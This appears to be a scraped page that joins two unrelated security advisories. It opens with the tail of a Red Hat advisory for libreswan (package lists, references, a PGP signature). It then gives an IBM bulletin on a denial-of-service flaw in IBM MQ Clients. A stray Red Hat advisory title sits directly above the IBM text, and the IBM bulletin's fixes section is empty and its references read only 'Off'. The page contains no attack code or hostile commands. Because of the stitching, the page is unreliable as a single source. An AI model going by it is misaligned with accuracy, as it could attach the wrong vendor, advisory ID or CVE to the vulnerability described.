aarch64:  
libreswan-4.6-3.el9_1.1.aarch64.rpm  
libreswan-debuginfo-4.6-3.el9_1.1.aarch64.rpm  
libreswan-debugsource-4.6-3.el9_1.1.aarch64.rpm

ppc64le:  
libreswan-4.6-3.el9_1.1.ppc64le.rpm  
libreswan-debuginfo-4.6-3.el9_1.1.ppc64le.rpm  
libreswan-debugsource-4.6-3.el9_1.1.ppc64le.rpm

s390x:  
libreswan-4.6-3.el9_1.1.s390x.rpm  
libreswan-debuginfo-4.6-3.el9_1.1.s390x.rpm  
libreswan-debugsource-4.6-3.el9_1.1.s390x.rpm

x86_64:  
libreswan-4.6-3.el9_1.1.x86_64.rpm  
libreswan-debuginfo-4.6-3.el9_1.1.x86_64.rpm  
libreswan-debugsource-4.6-3.el9_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30570  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFPxONzjgjWX9erEAQiDpw/+K8C5gWGcDjRqCvbpgZBnmHLBNUZkm5N+  
JzBPI4rUPWB8HkJqpn7E0ccRPIKZhEsnpbo2jWdZPyac3u9pwDB+LsqGG2GQo6go  
8X5Z9io3QAoV48gy/sI+OPMUDdDS7Lj/10Dg2m7ypib9qCKm51DN/xAKhThf1/JM  
MHXLg5CrSmOMtesv/emUHwFCl4vdQYx8bF/59GNkBp6gOslYoGf5xQZ9KZPe6/9L  
WGxcv7YJBZE5uAOt7vFp3WSGkTkmO1zfZXpRttz127EoFO8PdDuU9+yUJrtUk2dZ  
l2gBgsFucunVgFu30QbKpTw8kWihAMT0K0MBkeC6EyPN8TvpBCJf+P3D6Hzj+25b  
E92CTpRiS1IRBlCQhUlPoEhHrtdS4j3dRQoDIJpJ9MWsyRXy1pws8z+swefSmDJl  
oAn5KHjXhXGr8eHR7VSzmLxtr3f6E80S0n96QHgFtMt9BVPBqkqueLdPv6mch0GR  
fvIAwwU8bKrKbS6Rm82CBUXiAcqfGt6o2iiVYOOW2R5DrUoTxc0/SnAqujV+aprY  
3inqU3RE4x5922XCEqyQ/uG53E/Tvp21O7L6nsC0YxiqY7cT8RFCmTGWiwy/ZU8y  
dK+U5y9XtCAV165ec3jvliJpiFbFJgxghqiNiPluwsMjukkOGWeMOdAUFhje73dk  
z3ys6+zOQ+o=  
=2ODO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2120-01

IBM MQ Clients 9.2 CD, 9.3 CD, and 9.3 LTS are vulnerable to a denial of service attack when processing configuration files.  IBM X-Force ID:  244216.

**Security Bulletin**

  

**Summary**

An issue was identified that may cause IBM MQ Clients to be vulnerable to a denial of service attack when processing configuration files.

**Vulnerability Details**

**CVEID:**   CVE-2023-22874  
**DESCRIPTION:**   IBM MQ Clients are vulnerable to a denial of service attack when processing configuration files.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244216 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM MQ

9.2 CD

IBM MQ

9.3 CD

IBM MQ

9.3 LTS

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

26 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSYHRD","label":"IBM MQ"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF012","label":"IBM i"},{"code":"PF016","label":"Linux"},{"code":"PF051","label":"Linux on IBM Z Systems"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"}\],"Version":"9.2.4, 9.2.5, 9.3.0, 9.3.1, 9.3.2","Edition":"All","Line of Business":{"code":"LOB45","label":"Automation"}}\]

Tag

#linux